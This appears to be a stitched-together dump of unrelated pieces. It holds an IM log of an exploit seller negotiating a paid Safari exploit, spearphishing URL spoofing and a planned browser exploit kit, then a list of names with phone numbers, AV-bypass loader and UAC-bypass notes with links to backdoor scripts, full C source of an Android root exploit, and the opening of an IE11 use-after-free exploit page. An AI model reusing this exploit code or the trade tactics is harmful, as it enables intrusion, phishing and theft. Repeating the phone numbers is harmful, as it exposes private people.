2694(13:14:53) anony0wor@xmpp.ru: Ok perfect
2695(13:30:39) symlink40: hi friend
2696(13:30:39) symlink40: done
2697(13:30:46) symlink40: im recording video for you
2698(13:33:05) anony0wor@xmpp.ru has signed on.
2699(13:41:53) symlink40: you there
2700(13:41:54) symlink40: video done
2701(13:41:59) symlink40: where do you wanna upload it ?
2702(13:42:05) anony0wor@xmpp.ru: Yes
2703(13:42:11) anony0wor@xmpp.ru: Sendspace
2704(13:42:30) symlink40: ok
2705(13:42:40) symlink40: I tested on my external site and hided the url if that's okay
2706(13:42:56) symlink40: didn't wanna expose my personnal site url :)
2707(13:42:59) anony0wor@xmpp.ru: Ok no prob
2708(13:43:02) symlink40: uploading to sendspace in moment man
2709(13:43:08) anony0wor@xmpp.ru: Great
2710(13:54:53) anony0wor@xmpp.ru has signed on.
2711(13:54:58) symlink40: friend you there
2712(13:55:02) symlink40: sorry for letting you wait
2713(13:55:07) symlink40: network keeps going down
2714(13:55:08) symlink40: https://www.sendspace.com/file/269va4
2715(13:55:16) symlink40: uplaoded to send space
2716(13:55:18) anony0wor@xmpp.ru: Its ok
2717(13:55:21) anony0wor@xmpp.ru: Checking it
2718(13:55:24) symlink40: and now making fine changes on the payload
2719(13:55:27) symlink40: to finish it
2720(13:55:31) symlink40: for delivery
2721(13:57:37) anony0wor@xmpp.ru: I just checked it works well.
2722(13:57:45) symlink40: looks good ?
2723(13:57:57) anony0wor@xmpp.ru: If our payload is signed, it works well without any prompt.. right?
2724(13:58:05) anony0wor@xmpp.ru: Yes
2725(13:58:18) symlink40: im hiding the execution operation from the page and making new page for you so you can upload on your server to check status . failed/success exploitation
2726(13:58:23) symlink40: yes
2727(13:58:24) symlink40: works fine
2728(13:59:10) anony0wor@xmpp.ru: Okay great. You would assist if there is any issue in set up from my side right?
2729(13:59:13) symlink40: that will be a server side code for you to check the exploitation operation
2730example
2731failed/success attack
2732browser headers
2733ip address
2734last callback
2735incming callbacks
2736
2737(13:59:19) symlink40: yes
2738(13:59:26) symlink40: I provide help with no charges
2739(13:59:26) anony0wor@xmpp.ru: Okay perfect
2740(13:59:38) anony0wor@xmpp.ru: But now i have to pay you remaining 4500 ok?
2741(13:59:41) symlink40: yes
2742(14:00:16) anony0wor@xmpp.ru: That will take some time to arrange for me. I will be able to pay you that max by saturday
2743(14:00:31) anony0wor@xmpp.ru: Because i have to arrange coins
2744(14:00:33) symlink40: you don't have the money ?
2745(14:00:37) symlink40: at this moment ?
2746(14:00:42) anony0wor@xmpp.ru: I have money but not in btc
2747(14:01:11) symlink40: that's 2 days from now ?
2748(14:01:38) anony0wor@xmpp.ru: I am trying to get in btc soonest possible. If not tomorrow then max by saturday i will have in br
2749(14:01:43) anony0wor@xmpp.ru: *btc
2750(14:01:51) symlink40: but I will keep the source code for myself until you pay the rest 4500$ if that's okay for you ?
2751(14:01:55) symlink40: yeah no problem
2752(14:02:01) symlink40: I hope you get it soon!
2753(14:02:13) anony0wor@xmpp.ru: Yes friend no problem. You will deliver only when i pay
2754(14:02:22) symlink40: will be do reviews on the code until the day of final paymemt
2755(14:02:28) symlink40: to prevent any errors
2756(14:02:32) symlink40: thanks for trusting me
2757(14:02:33) anony0wor@xmpp.ru: Yup that will be great
2758(14:02:42) symlink40: any more questions you got for me friend ?
2759(14:02:46) anony0wor@xmpp.ru: No prob man. Looking forward to long term relation
2760(14:02:48) symlink40: need to go outside to smoke
2761(14:02:53) symlink40: thanks a lot
2762(14:02:55) symlink40: same here :)
2763(14:02:56) anony0wor@xmpp.ru: Sure. Me too
2764(14:03:12) symlink40: will be back in next 3 hours
2765(14:03:19) symlink40: anything you need . send me directly
2766(14:03:24) symlink40: have a great day friend !
2767(15:38:02) anony0wor@xmpp.ru has signed on.
2768(16:43:46) anony0wor@xmpp.ru has signed on.
2769(17:07:45) anony0wor@xmpp.ru has signed on.
2770(18:34:21) anony0wor@xmpp.ru has signed on.
2771(18:54:44) anony0wor@xmpp.ru has signed on.
2772(2017-03-03 00:19:18) anony0wor@xmpp.ru has signed on.
2773(00:26:06) Attempting to start a private conversation with anony0wor@xmpp.ru/Monal-iOS...
2774(00:26:14) symlink40: hi friend
2775(00:26:49) symlink40: im working on server side code for you to modify payloads everytime you want without touching or having to modify the source code of exploit manual . you can do remotely from a script
2776(01:02:35) symlink40: hii
2777(01:02:37) symlink40: you there ?
2778(01:04:01) symlink40: check
2779(01:04:02) symlink40: here
2780(01:04:03) symlink40: https://s29.postimg.org/4otbbm3av/safari_payload_add_remote.jpg
2781(01:05:08) symlink40: finished the script for adding your own payloads remotely after execution you can add whatever you want .. here in screenshot I added payload for a 0day that I had on safari URL SPOOFING .. check safari URL bar is showing gmail.com but the fake page looks real
2782(01:05:22) symlink40: this attack is good for spearphishing and stealing users data/login
2783(01:05:31) symlink40: let me know what do you think
2784(01:06:00) symlink40: also when I get time will add a full list of payloads to the script so you can choose from the list without having to type manually .!
2785(03:04:29) anony0wor@xmpp.ru has signed on.
2786(10:53:55) symlink40: hI
2787(2017-03-03 09:34:10) anony0wor@xmpp.ru: Wow man this is great
2788(2017-03-03 09:34:27) anony0wor@xmpp.ru: Yes i would like this to use with phishing also
2789(2017-03-03 09:35:52) anony0wor@xmpp.ru: I am arranging btc for you for tomorrow. I will be able to pay you tomorrow final.
2790(10:54:52) anony0wor@xmpp.ru has signed on.
2791(10:55:56) symlink40: good morning friend
2792(10:56:28) symlink40: Yeah no problem . tomorrow final payment right . 4500$ btc ?
2793(10:57:06) anony0wor@xmpp.ru: Good morning friend.
2794(10:57:11) anony0wor@xmpp.ru: Yes tomorrow final payment
2795(10:57:16) symlink40: ok that's good
2796(10:57:29) symlink40: I just woke up and need some time to relax and start working for final touches
2797(10:57:42) symlink40: anything you want me todo or you got questions ?
2798(10:58:26) symlink40: also after tomorrow payment if you bought the server+host let me know so I can give advices for good setup and how to setup landing pages easily and let the exploit do his work!
2799(10:58:49) symlink40: are you intrested in geolocation people also ?
2800(10:59:04) anony0wor@xmpp.ru: What we can do in geolocation?
2801(10:59:15) symlink40: locate people real location
2802(10:59:25) anony0wor@xmpp.ru: Means trace any number with mobile number... right?
2803(10:59:28) anony0wor@xmpp.ru: Yes
2804(10:59:29) symlink40: no
2805(10:59:32) symlink40: trace browser
2806(10:59:47) symlink40: not mobile phone numbers .. trace browsers by IP to geolocate them
2807(11:00:10) symlink40: I can add a google maps API + python script to collect info and display them easily
2808(11:02:09) symlink40: you will be here in next 30 minutes ?
2809(11:02:22) symlink40: I got idea for a full browser exploitation project. let me know
2810(11:02:34) anony0wor@xmpp.ru: Yes I am here
2811(11:02:50) symlink40: ok 30 minute will be back and talk !
2812(11:49:16) anony0wor@xmpp.ru has signed on.
2813(11:49:28) symlink40: hey. back
2814(11:52:59) anony0wor@xmpp.ru: Ok
2815(11:53:20) symlink40: I have idea and will start working on it tomorro when we finish our deal
2816(11:53:23) anony0wor@xmpp.ru: So what location you are talking about exactly? Location based on IP?
2817(11:53:27) symlink40: yes
2818(11:53:31) symlink40: location based on iP
2819(11:53:38) anony0wor@xmpp.ru: Its not a big thing
2820(11:53:47) anony0wor@xmpp.ru: Anyboday can see location based on ip
2821(11:53:57) symlink40: is not a big thing when browser pop an alert asking to allow/cancel location
2822(11:54:33) anony0wor@xmpp.ru: If the location is based on IP then no need for browser to prompt
2823(11:54:41) symlink40: yeah
2824(11:54:43) anony0wor@xmpp.ru: Any site can get visitor's IP
2825(11:54:45) symlink40: and if not based on IP ?
2826(11:54:47) symlink40: yeah
2827(11:54:49) symlink40: access log file
2828(11:55:02) symlink40: im talking about full exploit man .. get ip exploit browser . phishing
2829(11:55:11) symlink40: all of this in 1 project
2830(11:55:19) anony0wor@xmpp.ru: And systems won't have GPS device i think
2831(11:55:27) symlink40: who knows
2832(11:55:29) symlink40: anyway
2833(11:55:32) anony0wor@xmpp.ru: Okk i got your point
2834(11:55:53) anony0wor@xmpp.ru: You are saying to integrate all this in your deivery. Right?
2835(11:56:03) symlink40: I don't understand
2836(11:56:08) symlink40: what is deivery?
2837(11:56:15) anony0wor@xmpp.ru: *delivery
2838(11:56:24) anony0wor@xmpp.ru: That you will give me tomorrow for safari
2839(11:57:18) anony0wor@xmpp.ru: Ok you can add these features. I understand now what you are saying. You are doing good job
2840(11:57:36) anony0wor@xmpp.ru: You are adding these things for me. Correct?
2841(11:57:47) anony0wor@xmpp.ru: So that i will get these tomorrow when i pay you
2842(11:57:55) symlink40: ok
2843(11:57:58) symlink40: listen
2844(11:58:01) symlink40: after tomorrow payment
2845(11:58:29) anony0wor@xmpp.ru: Yes
2846(11:59:12) symlink40: you will get full source code of safari
2847modified version of source code + scripts coded for adding payloads remotely + list of payloads + function to check browser status,headers.geolocation.
2848+ URL spoofing vuln I added in server side code + promot phishing page as is real
2849(11:59:17) symlink40: anything else you wanna add or ask ?
2850(11:59:42) anony0wor@xmpp.ru: Yes. Understood. No more questions as of now
2851(11:59:44) symlink40: the payloads add is a web based interface I could make it look nice with some colors but had to code fast haha
2852(11:59:46) symlink40: ok friend
2853(12:00:05) symlink40: my idea for the next project is to collect all browser exploits in 1 pack
2854(12:00:08) anony0wor@xmpp.ru: Okay cool man
2855(12:00:25) anony0wor@xmpp.ru: Wow that would be great if all in one pack
2856(12:00:46) symlink40: im writing you how it will be
2857(12:01:24) anony0wor@xmpp.ru: Okay
2858(12:02:29) symlink40: attack senario will be
2859landing page (nice site for target to visit) once target visted the page a script will detect what browser he is using and what version and will simply callback to server and grabb the right exploit for the browser and make a redirection to exploit landing page .. by exploitation operation another simple script checks exploitation if it was success or failed and call back to home server adding System check-in and from there I can use my payload adder page to modify payloads on anything I want from the target browser
2860(12:02:32) symlink40: big project
2861(12:03:00) symlink40: so far will be 10 exploits includes chrome.firefox.opera and some safari buggs as I said and budget will be 20.000$ to finish
2862(12:03:05) symlink40: no one ever has done this :)
2863(12:04:18) anony0wor@xmpp.ru: Yes man the idea is great. There should be something like this.
2864(12:04:44) symlink40: yeah
2865(12:05:17) anony0wor@xmpp.ru: All of them will be 0 day?
2866(12:05:33) symlink40: yees
2867(12:05:34) symlink40: yes
2868(12:05:46) anony0wor@xmpp.ru: Sure?
2869(12:05:59) symlink40: yes
2870(12:06:04) symlink40: budget is 20.000$
2871(12:06:35) symlink40: some of them will my 0days and other will be bought and modified
2872(12:06:46) anony0wor@xmpp.ru: Okay no problem. You will have to also give the OS and browser versions on which it will work
2873(12:07:39) anony0wor@xmpp.ru: We can discuss on budget later
2874(12:08:38) symlink40: yeah
2875(12:08:54) symlink40: simple script to detect OS/Browser and browser version
2876(12:09:27) anony0wor@xmpp.ru: No. I mean you have to tell us for which versions of OS and browser the exploit is
2877(12:09:39) anony0wor@xmpp.ru: *exploits are/will be
2878(12:11:01) symlink40: there is a good chance also if a browse day accepte RCE that will be good to deliver exploit to OS like a windows LPE 0day will be deliverd and exploited via a drive by download
2879(12:11:25) anony0wor@xmpp.ru: But lets discuss about this after tomorrow. First lets finish this safari thing tomorrow
2880(12:11:40) symlink40: yeah no problem
2881(12:11:55) anony0wor@xmpp.ru: Catch you tomorrow man. Good day to you
2882(12:11:59) symlink40: this all browsers exploitation project is by me only and if you want we can work after we finish safari deal
2883(12:12:13) symlink40: have a nice day .. what time you will be here tomorrow ?
2884(12:12:29) anony0wor@xmpp.ru: Yes yes ofcourse i want to continue with you after safari deal
2885(12:12:36) symlink40: Thanks !
2886(12:12:56) anony0wor@xmpp.ru: Around same time may be. Or from before 6 hours from now
2887(12:13:30) symlink40: ok
2888(12:13:35) symlink40: sounds good
2889(12:13:40) symlink40: talk later friend.
2890(12:13:47) anony0wor@xmpp.ru: Yes
2891(13:38:07) anony0wor@xmpp.ru has signed on.
2892(13:54:10) symlink40: 6 hours
2893(13:54:17) symlink40: 7 hours
2894(13:54:20) symlink40: 8 hours
2895(13:54:25) symlink40: sorry wrong messages
2896(13:54:26) symlink40: damn
2897(13:54:49) anony0wor@xmpp.ru: No problem
2898(13:54:58) symlink40: thank you
2899
2900
2901Instead of 32-bit IE, this year’s Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time. 64-bit IE brings new challenges to exploit writers, for example, simple heap spraying technique will not work in 64-bit process. And in order to win the game, we also need to bypass the control flow guard (CFG) mitigation on windows 8.1 as well as the enhanced protected mode (EPM) sandbox of IE.
2902In this presentation, we will disclose the details of the 2 vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time. We will go through the poc exploit to demonstrate the techniques we used to work out a working IE 64-bit exploit. We will show how we achieved ASLR & CFG bypass and remote code execution in 64-bit IE with a single uninitialized memory bug. We will also discuss the bug we used to bypass IE’s EPM sandbox to achieve elevation of privilege.
2903
2904
2905Chrome, Firefox, Java, IE10 exploited at Pwn2Own competition
2906
2907
2908
2909During the first day of Pwn2Own competition at the CanSecWest conference in Vancouver , latest versions of all major browsers were exploited by hackers.Â
2910
2911Chrome, Firefox and Internet Explorer 10 on Windows 8 were successfully pwned by various competitors, bringing them tens of thousands of dollars in prizes.Â
2912
2913French vulnerability research and bug selling firm 'Vupen' brought down IE10 running on a Windows 8 powered Surface Pro tablet by exploiting a pair of flaws.
2914
2915Researchers Jon Butler and Nils from MWR Labs managed to exploit Google Chrome on Windows 7 and also used a kernel bug to bypass the sandbox.
2916
2917"By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process. We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges." they said. For this pwn they received $100,000 as reward.
2918
2919
2920The Java was also killed in Pwn2Own, Java cracked up to three times by three different hackers. Vupen also managed to exploit a vulnerability in Java, "Writing exploits in general is getting much harder. Java is really easy because there's no sandbox."
2921
2922According to the participants, Chrome was the hardest target because of its sandbox and Java was the easiest target this year.
2923
2924
2925
2926
2927
2928rawya 0612719096
2929sara istanbul 0695080404
2930mouna istanbul 0603520739
2931dunia istanbul 0679817013
2932ikram theatro 0606437709
2933
2934amal bacha (REJI) 0697815992
2935
2936
2937Crypto loader in to process Example (asm/Fasm)
293825/03/2016 14:25
2939
2940
2941Asm example:
2942Loader exe in to a process
2943- AV bypass and generate fake hided gui
2944- Generate key by time and user activity
2945- Decrypt section and write into DLL in disk
2946- Bypass proactive AV and inject dll into Explorer.exe
2947- execute dll
2948loader.asm
2949
2950
2951
2952sss
2953
2954
2955
2956dksdksdkdsk
2957
2958
2959ok
2960
2961hahah damn
2962what the fuck you
2963
2964
2965
2966
2967
2968Обход UAC, и Load untrusted code to signed/trusted code and level up to SYSTEM on fly
296906/08/2016 12:02
2970Обход UAC, и Load untrusted code to signed/trusted code and level up to SYSTEM on fly
2971ÐŸÑ€ÐµÐ·ÐµÐ½Ñ‚Ð°Ñ†Ð¸Ñ - http://kitsune.online/src/UAC.potx
2972Any windows BackDooring;) - http://kitsune.online/src/Add-RegBackdoor.ps1
2973FuckUac/FuckSystem - http://kitsune.online/src/invoke-uac-me.ps1
2974Windows Shim DB add our malware - http://kitsune.online/src/shim.cpp
2975Russian/English Add U ass to SYSTEM -http://kitsune.online/src/UAC.potx
2976Methodic
2977^(o-o)^~~ Leo Davidson method
2978^(o-o)^~~ Application Compatibility Shim Redirect method, from WinNT/Gootkit
2979^(o-o)^~~ ISecurityEditor WinNT/Simda method, used to turn off UAC
2980^(o-o)^~~ Wusa method used by Win32/Carberp
2981^(o-o)^~~ Appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes
2982^(o-o)^~~ Memory patching from MS "Fix it" patch shim (and as side effect arbitrary dll injection)
2983^(o-o)^~~ Windows 10 sysprep method, abusing different dll dependency added in Windows 10
2984^(o-o)^~~ Microsoft Management Console and EventViewer missing dependency
2985^(o-o)^~~ WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe
2986^(o-o)^~~ Win32/Addrop method, also used in Metasploit uacbypass module
2987^(o-o)^~~ Microsoft GWX backdoor
2988^(o-o)^~~ Appinfo whitelist/logic/API choice&usage
2989^(o-o)^~~ Microsoft Management Console and incorrect dll loading scheme
2990^(o-o)^~~ SxS DotLocal and targeting consent to gain system privileges
2991^(o-o)^~~ Package Manager and DISM
2992
2993
2994/*
* Android sensord 0day root exploit by s0m3b0dy
* tested on LG L7 (PL)
*
*
* need pentests? s0m3b0dy1(at)gmail.com
*
* * * * * * * * * * * * * * * * * * * * * * * *
*
* some Android devices have sensord deamon,
* for some ROMs the deamon is running as root process(there we can use this exploit)
*
* and
*---------
* root@android:/ # strace sensord
* ...
* open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
* ...
* open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
* fchmod(12, 0666) = 0
* fchmod(13, 0666) = 0
* ---------
* there is no check that the files are not links, so we can link it to eg. block device and make it rw!
* exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
*
* this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system pertition!
*
* the author is not responsible for any damage
* for education purpose only :)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <dirent.h>
#include <ctype.h>


#define FIFO_DAT "/data/misc/sensor/fifo_dat"
#define SH "/system/bin/mksh"

struct ext4_super_block {
/*00*/ __le32 s_inodes_count;
__le32 s_blocks_count_lo;
__le32 s_r_blocks_count_lo;
__le32 s_free_blocks_count_lo;
/*10*/ __le32 s_free_inodes_count;
__le32 s_first_data_block;
__le32 s_log_block_size;
__le32 s_log_cluster_size;
/*20*/ __le32 s_blocks_per_group;
__le32 s_clusters_per_group;
__le32 s_inodes_per_group;
__le32 s_mtime;
/*30*/ __le32 s_wtime;
__le16 s_mnt_count;
__le16 s_max_mnt_count;
__le16 s_magic;
__le16 s_state;
__le16 s_errors;
__le16 s_minor_rev_level;
/*40*/ __le32 s_lastcheck;
__le32 s_checkinterval;
__le32 s_creator_os;
__le32 s_rev_level;
/*50*/ __le16 s_def_resuid;
__le16 s_def_resgid;
__le32 s_first_ino;
__le16 s_inode_size;
__le16 s_block_group_nr;
__le32 s_feature_compat;
/*60*/ __le32 s_feature_incompat;
__le32 s_feature_ro_compat;
/*68*/ __u8 s_uuid[16];
/*78*/ char s_volume_name[16];
/*88*/ char s_last_mounted[64];
/*C8*/ __le32 s_algorithm_usage_bitmap;
__u8 s_prealloc_blocks;
__u8 s_prealloc_dir_blocks;
__le16 s_reserved_gdt_blocks;
/*D0*/ __u8 s_journal_uuid[16];
/*E0*/ __le32 s_journal_inum;
__le32 s_journal_dev;
__le32 s_last_orphan;
__le32 s_hash_seed[4];
__u8 s_def_hash_version;
__u8 s_jnl_backup_type;
__le16 s_desc_size;
/*100*/ __le32 s_default_mount_opts;
__le32 s_first_meta_bg;
__le32 s_mkfs_time;
__le32 s_jnl_blocks[17];
/*150*/ __le32 s_blocks_count_hi;
__le32 s_r_blocks_count_hi;
__le32 s_free_blocks_count_hi;
__le16 s_min_extra_isize;
__le16 s_want_extra_isize;
__le32 s_flags;
__le16 s_raid_stride;
__le16 s_mmp_update_interval;
__le64 s_mmp_block;
__le32 s_raid_stripe_width;
__u8 s_log_groups_per_flex;
__u8 s_checksum_type;
__u8 s_encryption_level;
__u8 s_reserved_pad;
__le64 s_kbytes_written;
__le32 s_snapshot_inum;
__le32 s_snapshot_id;
__le64 s_snapshot_r_blocks_count;
__le32 s_snapshot_list;
#define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
__le32 s_error_count;
__le32 s_first_error_time;
__le32 s_first_error_ino;
__le64 s_first_error_block;
__u8 s_first_error_func[32];
__le32 s_first_error_line;
__le32 s_last_error_time;
__le32 s_last_error_ino;
__le32 s_last_error_line;
__le64 s_last_error_block;
__u8 s_last_error_func[32];
#define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
__u8 s_mount_opts[64];
__le32 s_usr_quota_inum;
__le32 s_grp_quota_inum;
__le32 s_overhead_clusters;
__le32 s_backup_bgs[2];
__u8 s_encrypt_algos[4];
__u8 s_encrypt_pw_salt[16];
__le32 s_lpf_ino;
__le32 s_prj_quota_inum;
__le32 s_checksum_seed;
__le32 s_reserved[98];
__le32 s_checksum;
};

struct ext4_group_desc
{
__le32 bg_block_bitmap_lo;
__le32 bg_inode_bitmap_lo;
__le32 bg_inode_table_lo;
__le16 bg_free_blocks_count_lo;
__le16 bg_free_inodes_count_lo;
__le16 bg_used_dirs_count_lo;
__le16 bg_flags;
__le32 bg_exclude_bitmap_lo;
__le16 bg_block_bitmap_csum_lo;
__le16 bg_inode_bitmap_csum_lo;
__le16 bg_itable_unused_lo;
__le16 bg_checksum;
__le32 bg_block_bitmap_hi;
__le32 bg_inode_bitmap_hi;
__le32 bg_inode_table_hi;
__le16 bg_free_blocks_count_hi;
__le16 bg_free_inodes_count_hi;
__le16 bg_used_dirs_count_hi;
__le16 bg_itable_unused_hi;
__le32 bg_exclude_bitmap_hi;
__le16 bg_block_bitmap_csum_hi;
__le16 bg_inode_bitmap_csum_hi;
__u32 bg_reserved;
};

struct ext4_inode {
__le16 i_mode;
__le16 i_uid;
__le32 i_size_lo;
__le32 i_atime;
__le32 i_ctime;
__le32 i_mtime;
__le32 i_dtime;
__le16 i_gid;
__le16 i_links_count;
__le32 i_blocks_lo;
__le32 i_flags;
union {
struct {
__le32 l_i_version;
} linux1;
struct {
__u32 h_i_translator;
} hurd1;
struct {
__u32 m_i_reserved1;
} masix1;
} osd1;
__le32 i_block[15];
__le32 i_generation;
__le32 i_file_acl_lo;
__le32 i_size_high;
__le32 i_obso_faddr;
union {
struct {
__le16 l_i_blocks_high;
__le16 l_i_file_acl_high;
__le16 l_i_uid_high;
__le16 l_i_gid_high;
__le16 l_i_checksum_lo;
__le16 l_i_reserved;
} linux2;
struct {
__le16 h_i_reserved1;
__u16 h_i_mode_high;
__u16 h_i_uid_high;
__u16 h_i_gid_high;
__u32 h_i_author;
} hurd2;
struct {
__le16 h_i_reserved1;
__le16 m_i_file_acl_high;
__u32 m_i_reserved2[2];
} masix2;
} osd2;
__le16 i_extra_isize;
__le16 i_checksum_hi;
__le32 i_ctime_extra;
__le32 i_mtime_extra;
__le32 i_atime_extra;
__le32 i_crtime;
__le32 i_crtime_extra;
__le32 i_version_hi;
};

void print_usage( char ** argv)
{
printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
printf("Usage: %s 1\n", argv[0]);
printf(" %s 2\n", argv[0]);
printf(" %s 3\n", argv[0]);
printf(" %s verify\n", argv[0]);
}

void get_system_dev( char *ptr, int size )
{
int fd = open("/proc/mounts", O_RDONLY);
int pos = 0, posend = 0, tmppos = 0;
char buff[4096];
char link[1024];
memset(buff, 0, sizeof(buff));
memset(link, 0, sizeof(link));
memset(ptr, 0, size);
if(fd != -1)
{
read(fd, &buff, sizeof(buff));
int sres = (int)strstr(buff, " /system ");
if( (sres != -1) && ((pos = (sres - (int)buff)) > 0) )
{
tmppos = pos;
int i=0;
while( (buff[pos] != '\n') && (pos > 0) ) pos--;
pos++;
strncpy(link, &buff[pos], tmppos - pos);
readlink(link, ptr, size);

}
else
{
printf("[-] Can't find system partition!\n");
close(fd);
exit(0);
}
close(fd);
}
else
{
printf("[-] Can't read /proc/mounts file!\n");
exit(0);
}

}

void first_step()
{
if( access(FIFO_DAT, F_OK) != -1 )
{
unlink(FIFO_DAT);
}


char path[1024];
get_system_dev(path, sizeof(path));
symlink(path, FIFO_DAT);

printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
}

void second_step()
{
char path[1024];
struct stat s;

unlink(FIFO_DAT);

stat(SH, &s);
printf("[+] Looking for inode no.: %llu\n", s.st_ino);

get_system_dev(path, sizeof(path));

int fd = open(path, O_RDWR);
if( fd != -1 )
{
int inodeno = s.st_ino;
struct ext4_super_block super;
struct ext4_group_desc group_descr;
struct ext4_inode inode;

unsigned long int offset=0;
lseek(fd, 0x400, SEEK_SET);

read(fd, &super, sizeof(super));

int block_size = 1024 << super.s_log_block_size;
int bg = (inodeno-1) /super.s_inodes_per_group;

lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
read(fd, &group_descr, sizeof(group_descr));


unsigned int index = (inodeno-1) % super.s_inodes_per_group;
unsigned int off = index * super.s_inode_size;
unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;

lseek(fd, total_offset, SEEK_SET);
read(fd, &inode, sizeof(struct ext4_inode));

if(inode.i_size_lo == s.st_size) {
__le16 mode = 0;
printf("[+] Found inode!\n");
lseek(fd, total_offset, SEEK_SET);

inode.i_mode = inode.i_mode | 0x800;

int modesize = sizeof(inode.i_mode);
int wr = write(fd, &inode.i_mode, modesize);

if( wr == modesize )
{
printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
}
else
{
printf("[-] Can't set bit SUID on %s\n", SH);
}
}
else
{
printf("[-] Can't find inode!\n");
}
close(fd);
}
else
printf("[-] Can't open %s!\n", path);

}

void third_step()
{
char path[1024];
//chmod(SH, 4755);
setuid(0);
setgid(0);
if(getuid() == 0)
{

get_system_dev(path, sizeof(path));
chmod(path, 0600);
printf("[+] Rooted!\n");
system(SH);
}
else
{
printf("[-] No root here!\n");
exit(0);
}
}

bool isSensord(char *spath)
{
char buff[50];
bool res = false;
int fd = open(spath, O_RDONLY);
if(fd != -1)
{
read(fd, buff, 50);
if(strstr(buff, "/system/bin/sensord") != NULL)
{
res = true;
}
close(fd);
}
return res;
}

bool verify()
{
DIR* dir;
struct dirent *entry;
char spath[512];
bool res = false;
struct stat s;

dir = opendir("/proc");
if(dir) {
while ((entry = readdir(dir)) != NULL) {
if (entry->d_type == DT_DIR) {
snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);

if (isSensord(spath)) {
stat(spath, &s);
if (s.st_uid == 0)
res = true;

break;
}
}
}
closedir(dir);
}
return res;
}

void disable_autorotate()
{
printf("[+] Disabling auto-rotate...\n");
system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
}

int main(int argc, char **argv)
{

if(argc != 2)
{
print_usage( argv );
return 0;
}

if( strstr( argv[1], "1" ) != NULL) {
if( verify() ) {
disable_autorotate();
first_step(); //create link
}
else
{
printf("[-] It looks likey is not vulnerable!\n");
}
}
else if( strstr( argv[1], "2") != NULL) {
second_step(); //edit ext4(/system) partition(set bit suid)
}
else if( strstr( argv[1], "3") != NULL) {
third_step(); //get root shell
}
else if( strstr( argv[1], "verify") != NULL){
if( verify() )
printf("[+] Should be vulnerable!\n");
else
printf("[-] Not vulnerable!\n");
}
else{
print_usage( argv );
}



return 0;
}

2995
2996
2997
2998
2999
3000Microsoft Internet Explorer 11.0.9600.18482 Use-After-Free
3001Published Credit Risk
30022016.09.15 Marcin Ressel High
3003CWE CVE Local Remote
3004N/A N/A No Yes
3005
3006
3007 <!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script> 
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)

######################################################################################

0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child 
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
